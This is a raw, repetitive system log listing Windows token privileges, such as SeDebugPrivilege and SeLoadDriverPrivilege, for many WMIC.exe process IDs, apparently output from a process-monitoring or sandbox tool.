Token: SeSystemtimePrivilege	1800	WMIC.exe
Token: SeProfSingleProcessPrivilege	1800	WMIC.exe
Token: SeIncBasePriorityPrivilege	1800	WMIC.exe
Token: SeCreatePagefilePrivilege	1800	WMIC.exe
Token: SeBackupPrivilege	1800	WMIC.exe
Token: SeRestorePrivilege	1800	WMIC.exe
Token: SeShutdownPrivilege	1800	WMIC.exe
Token: SeDebugPrivilege	1800	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1800	WMIC.exe
Token: SeRemoteShutdownPrivilege	1800	WMIC.exe
Token: SeUndockPrivilege	1800	WMIC.exe
Token: SeManageVolumePrivilege	1800	WMIC.exe
Token: 33	1800	WMIC.exe
Token: 34	1800	WMIC.exe
Token: 35	1800	WMIC.exe
Token: 36	1800	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1800	WMIC.exe
Token: SeSecurityPrivilege	1800	WMIC.exe
Token: SeTakeOwnershipPrivilege	1800	WMIC.exe
Token: SeLoadDriverPrivilege	1800	WMIC.exe
Token: SeSystemProfilePrivilege	1800	WMIC.exe
Token: SeSystemtimePrivilege	1800	WMIC.exe
Token: SeProfSingleProcessPrivilege	1800	WMIC.exe
Token: SeIncBasePriorityPrivilege	1800	WMIC.exe
Token: SeCreatePagefilePrivilege	1800	WMIC.exe
Token: SeBackupPrivilege	1800	WMIC.exe
Token: SeRestorePrivilege	1800	WMIC.exe
Token: SeShutdownPrivilege	1800	WMIC.exe
Token: SeDebugPrivilege	1800	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1800	WMIC.exe
Token: SeRemoteShutdownPrivilege	1800	WMIC.exe
Token: SeUndockPrivilege	1800	WMIC.exe
Token: SeManageVolumePrivilege	1800	WMIC.exe
Token: 33	1800	WMIC.exe
Token: 34	1800	WMIC.exe
Token: 35	1800	WMIC.exe
Token: 36	1800	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1008	WMIC.exe
Token: SeSecurityPrivilege	1008	WMIC.exe
Token: SeTakeOwnershipPrivilege	1008	WMIC.exe
Token: SeLoadDriverPrivilege	1008	WMIC.exe
Token: SeSystemProfilePrivilege	1008	WMIC.exe
Token: SeSystemtimePrivilege	1008	WMIC.exe
Token: SeProfSingleProcessPrivilege	1008	WMIC.exe
Token: SeIncBasePriorityPrivilege	1008	WMIC.exe
Token: SeCreatePagefilePrivilege	1008	WMIC.exe
Token: SeBackupPrivilege	1008	WMIC.exe
Token: SeRestorePrivilege	1008	WMIC.exe
Token: SeShutdownPrivilege	1008	WMIC.exe
Token: SeDebugPrivilege	1008	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1008	WMIC.exe
Token: SeRemoteShutdownPrivilege	1008	WMIC.exe
Token: SeUndockPrivilege	1008	WMIC.exe
Token: SeManageVolumePrivilege	1008	WMIC.exe
Token: 33	1008	WMIC.exe
Token: 34	1008	WMIC.exe
Token: 35	1008	WMIC.exe
Token: 36	1008	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1008	WMIC.exe
Token: SeSecurityPrivilege	1008	WMIC.exe
Token: SeTakeOwnershipPrivilege	1008	WMIC.exe
Token: SeLoadDriverPrivilege	1008	WMIC.exe
Token: SeSystemProfilePrivilege	1008	WMIC.exe
Token: SeSystemtimePrivilege	1008	WMIC.exe
Token: SeProfSingleProcessPrivilege	1008	WMIC.exe
Token: SeIncBasePriorityPrivilege	1008	WMIC.exe
Token: SeCreatePagefilePrivilege	1008	WMIC.exe
Token: SeBackupPrivilege	1008	WMIC.exe
Token: SeRestorePrivilege	1008	WMIC.exe
Token: SeShutdownPrivilege	1008	WMIC.exe
Token: SeDebugPrivilege	1008	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1008	WMIC.exe
Token: SeRemoteShutdownPrivilege	1008	WMIC.exe
Token: SeUndockPrivilege	1008	WMIC.exe
Token: SeManageVolumePrivilege	1008	WMIC.exe
Token: 33	1008	WMIC.exe
Token: 34	1008	WMIC.exe
Token: 35	1008	WMIC.exe
Token: 36	1008	WMIC.exe
Token: SeIncreaseQuotaPrivilege	268	WMIC.exe
Token: SeSecurityPrivilege	268	WMIC.exe
Token: SeTakeOwnershipPrivilege	268	WMIC.exe
Token: SeLoadDriverPrivilege	268	WMIC.exe
Token: SeSystemProfilePrivilege	268	WMIC.exe
Token: SeSystemtimePrivilege	268	WMIC.exe
Token: SeProfSingleProcessPrivilege	268	WMIC.exe
Token: SeIncBasePriorityPrivilege	268	WMIC.exe
Token: SeCreatePagefilePrivilege	268	WMIC.exe
Token: SeBackupPrivilege	268	WMIC.exe
Token: SeRestorePrivilege	268	WMIC.exe
Token: SeShutdownPrivilege	268	WMIC.exe
Token: SeDebugPrivilege	268	WMIC.exe
Token: SeSystemEnvironmentPrivilege	268	WMIC.exe
Token: SeRemoteShutdownPrivilege	268	WMIC.exe
Token: SeUndockPrivilege	268	WMIC.exe
Token: SeManageVolumePrivilege	268	WMIC.exe
Token: 33	268	WMIC.exe
Token: 34	268	WMIC.exe
Token: 35	268	WMIC.exe
Token: 36	268	WMIC.exe
Token: SeIncreaseQuotaPrivilege	268	WMIC.exe
Token: SeSecurityPrivilege	268	WMIC.exe
Token: SeTakeOwnershipPrivilege	268	WMIC.exe
Token: SeLoadDriverPrivilege	268	WMIC.exe
Token: SeSystemProfilePrivilege	268	WMIC.exe
Token: SeSystemtimePrivilege	268	WMIC.exe
Token: SeProfSingleProcessPrivilege	268	WMIC.exe
Token: SeIncBasePriorityPrivilege	268	WMIC.exe
Token: SeCreatePagefilePrivilege	268	WMIC.exe
Token: SeBackupPrivilege	268	WMIC.exe
Token: SeRestorePrivilege	268	WMIC.exe
Token: SeShutdownPrivilege	268	WMIC.exe
Token: SeDebugPrivilege	268	WMIC.exe
Token: SeSystemEnvironmentPrivilege	268	WMIC.exe
Token: SeRemoteShutdownPrivilege	268	WMIC.exe
Token: SeUndockPrivilege	268	WMIC.exe
Token: SeManageVolumePrivilege	268	WMIC.exe
Token: 33	268	WMIC.exe
Token: 34	268	WMIC.exe
Token: 35	268	WMIC.exe
Token: 36	268	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3848	WMIC.exe
Token: SeSecurityPrivilege	3848	WMIC.exe
Token: SeTakeOwnershipPrivilege	3848	WMIC.exe
Token: SeLoadDriverPrivilege	3848	WMIC.exe
Token: SeSystemProfilePrivilege	3848	WMIC.exe
Token: SeSystemtimePrivilege	3848	WMIC.exe
Token: SeProfSingleProcessPrivilege	3848	WMIC.exe
Token: SeIncBasePriorityPrivilege	3848	WMIC.exe
Token: SeCreatePagefilePrivilege	3848	WMIC.exe
Token: SeBackupPrivilege	3848	WMIC.exe
Token: SeRestorePrivilege	3848	WMIC.exe
Token: SeShutdownPrivilege	3848	WMIC.exe
Token: SeDebugPrivilege	3848	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3848	WMIC.exe
Token: SeRemoteShutdownPrivilege	3848	WMIC.exe
Token: SeUndockPrivilege	3848	WMIC.exe
Token: SeManageVolumePrivilege	3848	WMIC.exe
Token: 33	3848	WMIC.exe
Token: 34	3848	WMIC.exe
Token: 35	3848	WMIC.exe
Token: 36	3848	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3848	WMIC.exe
Token: SeSecurityPrivilege	3848	WMIC.exe
Token: SeTakeOwnershipPrivilege	3848	WMIC.exe
Token: SeLoadDriverPrivilege	3848	WMIC.exe
Token: SeSystemProfilePrivilege	3848	WMIC.exe
Token: SeSystemtimePrivilege	3848	WMIC.exe
Token: SeProfSingleProcessPrivilege	3848	WMIC.exe
Token: SeIncBasePriorityPrivilege	3848	WMIC.exe
Token: SeCreatePagefilePrivilege	3848	WMIC.exe
Token: SeBackupPrivilege	3848	WMIC.exe
Token: SeRestorePrivilege	3848	WMIC.exe
Token: SeShutdownPrivilege	3848	WMIC.exe
Token: SeDebugPrivilege	3848	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3848	WMIC.exe
Token: SeRemoteShutdownPrivilege	3848	WMIC.exe
Token: SeUndockPrivilege	3848	WMIC.exe
Token: SeManageVolumePrivilege	3848	WMIC.exe
Token: 33	3848	WMIC.exe
Token: 34	3848	WMIC.exe
Token: 35	3848	WMIC.exe
Token: 36	3848	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1476	WMIC.exe
Token: SeSecurityPrivilege	1476	WMIC.exe
Token: SeTakeOwnershipPrivilege	1476	WMIC.exe
Token: SeLoadDriverPrivilege	1476	WMIC.exe
Token: SeSystemProfilePrivilege	1476	WMIC.exe
Token: SeSystemtimePrivilege	1476	WMIC.exe
Token: SeProfSingleProcessPrivilege	1476	WMIC.exe
Token: SeIncBasePriorityPrivilege	1476	WMIC.exe
Token: SeCreatePagefilePrivilege	1476	WMIC.exe
Token: SeBackupPrivilege	1476	WMIC.exe
Token: SeRestorePrivilege	1476	WMIC.exe
Token: SeShutdownPrivilege	1476	WMIC.exe
Token: SeDebugPrivilege	1476	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1476	WMIC.exe
Token: SeRemoteShutdownPrivilege	1476	WMIC.exe
Token: SeUndockPrivilege	1476	WMIC.exe
Token: SeManageVolumePrivilege	1476	WMIC.exe
Token: 33	1476	WMIC.exe
Token: 34	1476	WMIC.exe
Token: 35	1476	WMIC.exe
Token: 36	1476	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1476	WMIC.exe
Token: SeSecurityPrivilege	1476	WMIC.exe
Token: SeTakeOwnershipPrivilege	1476	WMIC.exe
Token: SeLoadDriverPrivilege	1476	WMIC.exe
Token: SeSystemProfilePrivilege	1476	WMIC.exe
Token: SeSystemtimePrivilege	1476	WMIC.exe
Token: SeProfSingleProcessPrivilege	1476	WMIC.exe
Token: SeIncBasePriorityPrivilege	1476	WMIC.exe
Token: SeCreatePagefilePrivilege	1476	WMIC.exe
Token: SeBackupPrivilege	1476	WMIC.exe
Token: SeRestorePrivilege	1476	WMIC.exe
Token: SeShutdownPrivilege	1476	WMIC.exe
Token: SeDebugPrivilege	1476	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1476	WMIC.exe
Token: SeRemoteShutdownPrivilege	1476	WMIC.exe
Token: SeUndockPrivilege	1476	WMIC.exe
Token: SeManageVolumePrivilege	1476	WMIC.exe
Token: 33	1476	WMIC.exe
Token: 34	1476	WMIC.exe
Token: 35	1476	WMIC.exe
Token: 36	1476	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1872	WMIC.exe
Token: SeSecurityPrivilege	1872	WMIC.exe
Token: SeTakeOwnershipPrivilege	1872	WMIC.exe
Token: SeLoadDriverPrivilege	1872	WMIC.exe
Token: SeSystemProfilePrivilege	1872	WMIC.exe
Token: SeSystemtimePrivilege	1872	WMIC.exe
Token: SeProfSingleProcessPrivilege	1872	WMIC.exe
Token: SeIncBasePriorityPrivilege	1872	WMIC.exe
Token: SeCreatePagefilePrivilege	1872	WMIC.exe
Token: SeBackupPrivilege	1872	WMIC.exe
Token: SeRestorePrivilege	1872	WMIC.exe
Token: SeShutdownPrivilege	1872	WMIC.exe
Token: SeDebugPrivilege	1872	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1872	WMIC.exe
Token: SeRemoteShutdownPrivilege	1872	WMIC.exe
Token: SeUndockPrivilege	1872	WMIC.exe
Token: SeManageVolumePrivilege	1872	WMIC.exe
Token: 33	1872	WMIC.exe
Token: 34	1872	WMIC.exe
Token: 35	1872	WMIC.exe
Token: 36	1872	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1872	WMIC.exe
Token: SeSecurityPrivilege	1872	WMIC.exe
Token: SeTakeOwnershipPrivilege	1872	WMIC.exe
Token: SeLoadDriverPrivilege	1872	WMIC.exe
Token: SeSystemProfilePrivilege	1872	WMIC.exe
Token: SeSystemtimePrivilege	1872	WMIC.exe
Token: SeProfSingleProcessPrivilege	1872	WMIC.exe
Token: SeIncBasePriorityPrivilege	1872	WMIC.exe
Token: SeCreatePagefilePrivilege	1872	WMIC.exe
Token: SeBackupPrivilege	1872	WMIC.exe
Token: SeRestorePrivilege	1872	WMIC.exe
Token: SeShutdownPrivilege	1872	WMIC.exe
Token: SeDebugPrivilege	1872	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1872	WMIC.exe
Token: SeRemoteShutdownPrivilege	1872	WMIC.exe
Token: SeUndockPrivilege	1872	WMIC.exe
Token: SeManageVolumePrivilege	1872	WMIC.exe
Token: 33	1872	WMIC.exe
Token: 34	1872	WMIC.exe
Token: 35	1872	WMIC.exe
Token: 36	1872	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3084	WMIC.exe
Token: SeSecurityPrivilege	3084	WMIC.exe
Token: SeTakeOwnershipPrivilege	3084	WMIC.exe
Token: SeLoadDriverPrivilege	3084	WMIC.exe
Token: SeSystemProfilePrivilege	3084	WMIC.exe
Token: SeSystemtimePrivilege	3084	WMIC.exe
Token: SeProfSingleProcessPrivilege	3084	WMIC.exe
Token: SeIncBasePriorityPrivilege	3084	WMIC.exe
Token: SeCreatePagefilePrivilege	3084	WMIC.exe
Token: SeBackupPrivilege	3084	WMIC.exe
Token: SeRestorePrivilege	3084	WMIC.exe
Token: SeShutdownPrivilege	3084	WMIC.exe
Token: SeDebugPrivilege	3084	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3084	WMIC.exe
Token: SeRemoteShutdownPrivilege	3084	WMIC.exe
Token: SeUndockPrivilege	3084	WMIC.exe
Token: SeManageVolumePrivilege	3084	WMIC.exe
Token: 33	3084	WMIC.exe
Token: 34	3084	WMIC.exe
Token: 35	3084	WMIC.exe
Token: 36	3084	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3084	WMIC.exe
Token: SeSecurityPrivilege	3084	WMIC.exe
Token: SeTakeOwnershipPrivilege	3084	WMIC.exe
Token: SeLoadDriverPrivilege	3084	WMIC.exe
Token: SeSystemProfilePrivilege	3084	WMIC.exe
Token: SeSystemtimePrivilege	3084	WMIC.exe
Token: SeProfSingleProcessPrivilege	3084	WMIC.exe
Token: SeIncBasePriorityPrivilege	3084	WMIC.exe
Token: SeCreatePagefilePrivilege	3084	WMIC.exe
Token: SeBackupPrivilege	3084	WMIC.exe
Token: SeRestorePrivilege	3084	WMIC.exe
Token: SeShutdownPrivilege	3084	WMIC.exe
Token: SeDebugPrivilege	3084	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3084	WMIC.exe
Token: SeRemoteShutdownPrivilege	3084	WMIC.exe
Token: SeUndockPrivilege	3084	WMIC.exe
Token: SeManageVolumePrivilege	3084	WMIC.exe
Token: 33	3084	WMIC.exe
Token: 34	3084	WMIC.exe
Token: 35	3084	WMIC.exe
Token: 36	3084	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3132	WMIC.exe
Token: SeSecurityPrivilege	3132	WMIC.exe
Token: SeTakeOwnershipPrivilege	3132	WMIC.exe
Token: SeLoadDriverPrivilege	3132	WMIC.exe
Token: SeSystemProfilePrivilege	3132	WMIC.exe
Token: SeSystemtimePrivilege	3132	WMIC.exe
Token: SeProfSingleProcessPrivilege	3132	WMIC.exe
Token: SeIncBasePriorityPrivilege	3132	WMIC.exe
Token: SeCreatePagefilePrivilege	3132	WMIC.exe
Token: SeBackupPrivilege	3132	WMIC.exe
Token: SeRestorePrivilege	3132	WMIC.exe
Token: SeShutdownPrivilege	3132	WMIC.exe
Token: SeDebugPrivilege	3132	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3132	WMIC.exe
Token: SeRemoteShutdownPrivilege	3132	WMIC.exe
Token: SeUndockPrivilege	3132	WMIC.exe
Token: SeManageVolumePrivilege	3132	WMIC.exe
Token: 33	3132	WMIC.exe
Token: 34	3132	WMIC.exe
Token: 35	3132	WMIC.exe
Token: 36	3132	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3132	WMIC.exe
Token: SeSecurityPrivilege	3132	WMIC.exe
Token: SeTakeOwnershipPrivilege	3132	WMIC.exe
Token: SeLoadDriverPrivilege	3132	WMIC.exe
Token: SeSystemProfilePrivilege	3132	WMIC.exe
Token: SeSystemtimePrivilege	3132	WMIC.exe
Token: SeProfSingleProcessPrivilege	3132	WMIC.exe
Token: SeIncBasePriorityPrivilege	3132	WMIC.exe
Token: SeCreatePagefilePrivilege	3132	WMIC.exe
Token: SeBackupPrivilege	3132	WMIC.exe
Token: SeRestorePrivilege	3132	WMIC.exe
Token: SeShutdownPrivilege	3132	WMIC.exe
Token: SeDebugPrivilege	3132	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3132	WMIC.exe
Token: SeRemoteShutdownPrivilege	3132	WMIC.exe
Token: SeUndockPrivilege	3132	WMIC.exe
Token: SeManageVolumePrivilege	3132	WMIC.exe
Token: 33	3132	WMIC.exe
Token: 34	3132	WMIC.exe
Token: 35	3132	WMIC.exe
Token: 36	3132	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2252	WMIC.exe
Token: SeSecurityPrivilege	2252	WMIC.exe
Token: SeTakeOwnershipPrivilege	2252	WMIC.exe
Token: SeLoadDriverPrivilege	2252	WMIC.exe
Token: SeSystemProfilePrivilege	2252	WMIC.exe
Token: SeSystemtimePrivilege	2252	WMIC.exe
Token: SeProfSingleProcessPrivilege	2252	WMIC.exe
Token: SeIncBasePriorityPrivilege	2252	WMIC.exe
Token: SeCreatePagefilePrivilege	2252	WMIC.exe
Token: SeBackupPrivilege	2252	WMIC.exe
Token: SeRestorePrivilege	2252	WMIC.exe
Token: SeShutdownPrivilege	2252	WMIC.exe
Token: SeDebugPrivilege	2252	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2252	WMIC.exe
Token: SeRemoteShutdownPrivilege	2252	WMIC.exe
Token: SeUndockPrivilege	2252	WMIC.exe
Token: SeManageVolumePrivilege	2252	WMIC.exe
Token: 33	2252	WMIC.exe
Token: 34	2252	WMIC.exe
Token: 35	2252	WMIC.exe
Token: 36	2252	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2252	WMIC.exe
Token: SeSecurityPrivilege	2252	WMIC.exe
Token: SeTakeOwnershipPrivilege	2252	WMIC.exe
Token: SeLoadDriverPrivilege	2252	WMIC.exe
Token: SeSystemProfilePrivilege	2252	WMIC.exe
Token: SeSystemtimePrivilege	2252	WMIC.exe
Token: SeProfSingleProcessPrivilege	2252	WMIC.exe
Token: SeIncBasePriorityPrivilege	2252	WMIC.exe
Token: SeCreatePagefilePrivilege	2252	WMIC.exe
Token: SeBackupPrivilege	2252	WMIC.exe
Token: SeRestorePrivilege	2252	WMIC.exe
Token: SeShutdownPrivilege	2252	WMIC.exe
Token: SeDebugPrivilege	2252	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2252	WMIC.exe
Token: SeRemoteShutdownPrivilege	2252	WMIC.exe
Token: SeUndockPrivilege	2252	WMIC.exe
Token: SeManageVolumePrivilege	2252	WMIC.exe
Token: 33	2252	WMIC.exe
Token: 34	2252	WMIC.exe
Token: 35	2252	WMIC.exe
Token: 36	2252	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3444	WMIC.exe
Token: SeSecurityPrivilege	3444	WMIC.exe
Token: SeTakeOwnershipPrivilege	3444	WMIC.exe
Token: SeLoadDriverPrivilege	3444	WMIC.exe
Token: SeSystemProfilePrivilege	3444	WMIC.exe
Token: SeSystemtimePrivilege	3444	WMIC.exe
Token: SeProfSingleProcessPrivilege	3444	WMIC.exe
Token: SeIncBasePriorityPrivilege	3444	WMIC.exe
Token: SeCreatePagefilePrivilege	3444	WMIC.exe
Token: SeBackupPrivilege	3444	WMIC.exe
Token: SeRestorePrivilege	3444	WMIC.exe
Token: SeShutdownPrivilege	3444	WMIC.exe
Token: SeDebugPrivilege	3444	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3444	WMIC.exe
Token: SeRemoteShutdownPrivilege	3444	WMIC.exe
Token: SeUndockPrivilege	3444	WMIC.exe
Token: SeManageVolumePrivilege	3444	WMIC.exe
Token: 33	3444	WMIC.exe
Token: 34	3444	WMIC.exe
Token: 35	3444	WMIC.exe
Token: 36	3444	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3444	WMIC.exe
Token: SeSecurityPrivilege	3444	WMIC.exe
Token: SeTakeOwnershipPrivilege	3444	WMIC.exe
Token: SeLoadDriverPrivilege	3444	WMIC.exe
Token: SeSystemProfilePrivilege	3444	WMIC.exe
Token: SeSystemtimePrivilege	3444	WMIC.exe
Token: SeProfSingleProcessPrivilege	3444	WMIC.exe
Token: SeIncBasePriorityPrivilege	3444	WMIC.exe
Token: SeCreatePagefilePrivilege	3444	WMIC.exe
Token: SeBackupPrivilege	3444	WMIC.exe
Token: SeRestorePrivilege	3444	WMIC.exe
Token: SeShutdownPrivilege	3444	WMIC.exe
Token: SeDebugPrivilege	3444	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3444	WMIC.exe
Token: SeRemoteShutdownPrivilege	3444	WMIC.exe
Token: SeUndockPrivilege	3444	WMIC.exe
Token: SeManageVolumePrivilege	3444	WMIC.exe
Token: 33	3444	WMIC.exe
Token: 34	3444	WMIC.exe
Token: 35	3444	WMIC.exe
Token: 36	3444	WMIC.exe
Token: SeIncreaseQuotaPrivilege	508	WMIC.exe
Token: SeSecurityPrivilege	508	WMIC.exe
Token: SeTakeOwnershipPrivilege	508	WMIC.exe
Token: SeLoadDriverPrivilege	508	WMIC.exe
Token: SeSystemProfilePrivilege	508	WMIC.exe
Token: SeSystemtimePrivilege	508	WMIC.exe
Token: SeProfSingleProcessPrivilege	508	WMIC.exe
Token: SeIncBasePriorityPrivilege	508	WMIC.exe
Token: SeCreatePagefilePrivilege	508	WMIC.exe
Token: SeBackupPrivilege	508	WMIC.exe
Token: SeRestorePrivilege	508	WMIC.exe
Token: SeShutdownPrivilege	508	WMIC.exe
Token: SeDebugPrivilege	508	WMIC.exe
Token: SeSystemEnvironmentPrivilege	508	WMIC.exe
Token: SeRemoteShutdownPrivilege	508	WMIC.exe
Token: SeUndockPrivilege	508	WMIC.exe
Token: SeManageVolumePrivilege	508	WMIC.exe
Token: 33	508	WMIC.exe
Token: 34	508	WMIC.exe
Token: 35	508	WMIC.exe
Token: 36	508	WMIC.exe
Token: SeIncreaseQuotaPrivilege	508	WMIC.exe
Token: SeSecurityPrivilege	508	WMIC.exe
Token: SeTakeOwnershipPrivilege	508	WMIC.exe
Token: SeLoadDriverPrivilege	508	WMIC.exe
Token: SeSystemProfilePrivilege	508	WMIC.exe
Token: SeSystemtimePrivilege	508	WMIC.exe
Token: SeProfSingleProcessPrivilege	508	WMIC.exe
Token: SeIncBasePriorityPrivilege	508	WMIC.exe
Token: SeCreatePagefilePrivilege	508	WMIC.exe
Token: SeBackupPrivilege	508	WMIC.exe
Token: SeRestorePrivilege	508	WMIC.exe
Token: SeShutdownPrivilege	508	WMIC.exe
Token: SeDebugPrivilege	508	WMIC.exe
Token: SeSystemEnvironmentPrivilege	508	WMIC.exe
Token: SeRemoteShutdownPrivilege	508	WMIC.exe
Token: SeUndockPrivilege	508	WMIC.exe
Token: SeManageVolumePrivilege	508	WMIC.exe
Token: 33	508	WMIC.exe
Token: 34	508	WMIC.exe
Token: 35	508	WMIC.exe
Token: 36	508	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3996	WMIC.exe
Token: SeSecurityPrivilege	3996	WMIC.exe
Token: SeTakeOwnershipPrivilege	3996	WMIC.exe
Token: SeLoadDriverPrivilege	3996	WMIC.exe
Token: SeSystemProfilePrivilege	3996	WMIC.exe
Token: SeSystemtimePrivilege	3996	WMIC.exe
Token: SeProfSingleProcessPrivilege	3996	WMIC.exe
Token: SeIncBasePriorityPrivilege	3996	WMIC.exe
Token: SeCreatePagefilePrivilege	3996	WMIC.exe
Token: SeBackupPrivilege	3996	WMIC.exe
Token: SeRestorePrivilege	3996	WMIC.exe
Token: SeShutdownPrivilege	3996	WMIC.exe
Token: SeDebugPrivilege	3996	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3996	WMIC.exe
Token: SeRemoteShutdownPrivilege	3996	WMIC.exe
Token: SeUndockPrivilege	3996	WMIC.exe
Token: SeManageVolumePrivilege	3996	WMIC.exe
Token: 33	3996	WMIC.exe
Token: 34	3996	WMIC.exe
Token: 35	3996	WMIC.exe
Token: 36	3996	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3996	WMIC.exe
Token: SeSecurityPrivilege	3996	WMIC.exe
Token: SeTakeOwnershipPrivilege	3996	WMIC.exe
Token: SeLoadDriverPrivilege	3996	WMIC.exe
Token: SeSystemProfilePrivilege	3996	WMIC.exe
Token: SeSystemtimePrivilege	3996	WMIC.exe
Token: SeProfSingleProcessPrivilege	3996	WMIC.exe
Token: SeIncBasePriorityPrivilege	3996	WMIC.exe
Token: SeCreatePagefilePrivilege	3996	WMIC.exe
Token: SeBackupPrivilege	3996	WMIC.exe
Token: SeRestorePrivilege	3996	WMIC.exe
Token: SeShutdownPrivilege	3996	WMIC.exe
Token: SeDebugPrivilege	3996	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3996	WMIC.exe
Token: SeRemoteShutdownPrivilege	3996	WMIC.exe
Token: SeUndockPrivilege	3996	WMIC.exe
Token: SeManageVolumePrivilege	3996	WMIC.exe
Token: 33	3996	WMIC.exe
Token: 34	3996	WMIC.exe
Token: 35	3996	WMIC.exe
Token: 36	3996	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3992	WMIC.exe
Token: SeSecurityPrivilege	3992	WMIC.exe
Token: SeTakeOwnershipPrivilege	3992	WMIC.exe
Token: SeLoadDriverPrivilege	3992	WMIC.exe
Token: SeSystemProfilePrivilege	3992	WMIC.exe
Token: SeSystemtimePrivilege	3992	WMIC.exe
Token: SeProfSingleProcessPrivilege	3992	WMIC.exe
Token: SeIncBasePriorityPrivilege	3992	WMIC.exe
Token: SeCreatePagefilePrivilege	3992	WMIC.exe
Token: SeBackupPrivilege	3992	WMIC.exe
Token: SeRestorePrivilege	3992	WMIC.exe
Token: SeShutdownPrivilege	3992	WMIC.exe
Token: SeDebugPrivilege	3992	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3992	WMIC.exe
Token: SeRemoteShutdownPrivilege	3992	WMIC.exe
Token: SeUndockPrivilege	3992	WMIC.exe
Token: SeManageVolumePrivilege	3992	WMIC.exe
Token: 33	3992	WMIC.exe
Token: 34	3992	WMIC.exe
Token: 35	3992	WMIC.exe
Token: 36	3992	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3992	WMIC.exe
Token: SeSecurityPrivilege	3992	WMIC.exe
Token: SeTakeOwnershipPrivilege	3992	WMIC.exe
Token: SeLoadDriverPrivilege	3992	WMIC.exe
Token: SeSystemProfilePrivilege	3992	WMIC.exe
Token: SeSystemtimePrivilege	3992	WMIC.exe
Token: SeProfSingleProcessPrivilege	3992	WMIC.exe
Token: SeIncBasePriorityPrivilege	3992	WMIC.exe
Token: SeCreatePagefilePrivilege	3992	WMIC.exe
Token: SeBackupPrivilege	3992	WMIC.exe
Token: SeRestorePrivilege	3992	WMIC.exe
Token: SeShutdownPrivilege	3992	WMIC.exe
Token: SeDebugPrivilege	3992	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3992	WMIC.exe
Token: SeRemoteShutdownPrivilege	3992	WMIC.exe
Token: SeUndockPrivilege	3992	WMIC.exe
Token: SeManageVolumePrivilege	3992	WMIC.exe
Token: 33	3992	WMIC.exe
Token: 34	3992	WMIC.exe
Token: 35	3992	WMIC.exe
Token: 36	3992	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1068	WMIC.exe
Token: SeSecurityPrivilege	1068	WMIC.exe
Token: SeTakeOwnershipPrivilege	1068	WMIC.exe
Token: SeLoadDriverPrivilege	1068	WMIC.exe
Token: SeSystemProfilePrivilege	1068	WMIC.exe
Token: SeSystemtimePrivilege	1068	WMIC.exe
Token: SeProfSingleProcessPrivilege	1068	WMIC.exe
Token: SeIncBasePriorityPrivilege	1068	WMIC.exe
Token: SeCreatePagefilePrivilege	1068	WMIC.exe
Token: SeBackupPrivilege	1068	WMIC.exe
Token: SeRestorePrivilege	1068	WMIC.exe
Token: SeShutdownPrivilege	1068	WMIC.exe
Token: SeDebugPrivilege	1068	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1068	WMIC.exe
Token: SeRemoteShutdownPrivilege	1068	WMIC.exe
Token: SeUndockPrivilege	1068	WMIC.exe
Token: SeManageVolumePrivilege	1068	WMIC.exe
Token: 33	1068	WMIC.exe
Token: 34	1068	WMIC.exe
Token: 35	1068	WMIC.exe
Token: 36	1068	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1068	WMIC.exe
Token: SeSecurityPrivilege	1068	WMIC.exe
Token: SeTakeOwnershipPrivilege	1068	WMIC.exe
Token: SeLoadDriverPrivilege	1068	WMIC.exe
Token: SeSystemProfilePrivilege	1068	WMIC.exe
Token: SeSystemtimePrivilege	1068	WMIC.exe
Token: SeProfSingleProcessPrivilege	1068	WMIC.exe
Token: SeIncBasePriorityPrivilege	1068	WMIC.exe
Token: SeCreatePagefilePrivilege	1068	WMIC.exe
Token: SeBackupPrivilege	1068	WMIC.exe
Token: SeRestorePrivilege	1068	WMIC.exe
Token: SeShutdownPrivilege	1068	WMIC.exe
Token: SeDebugPrivilege	1068	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1068	WMIC.exe
Token: SeRemoteShutdownPrivilege	1068	WMIC.exe
Token: SeUndockPrivilege	1068	WMIC.exe
Token: SeManageVolumePrivilege	1068	WMIC.exe
Token: 33	1068	WMIC.exe
Token: 34	1068	WMIC.exe
Token: 35	1068	WMIC.exe
Token: 36	1068	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1252	WMIC.exe
Token: SeSecurityPrivilege	1252	WMIC.exe
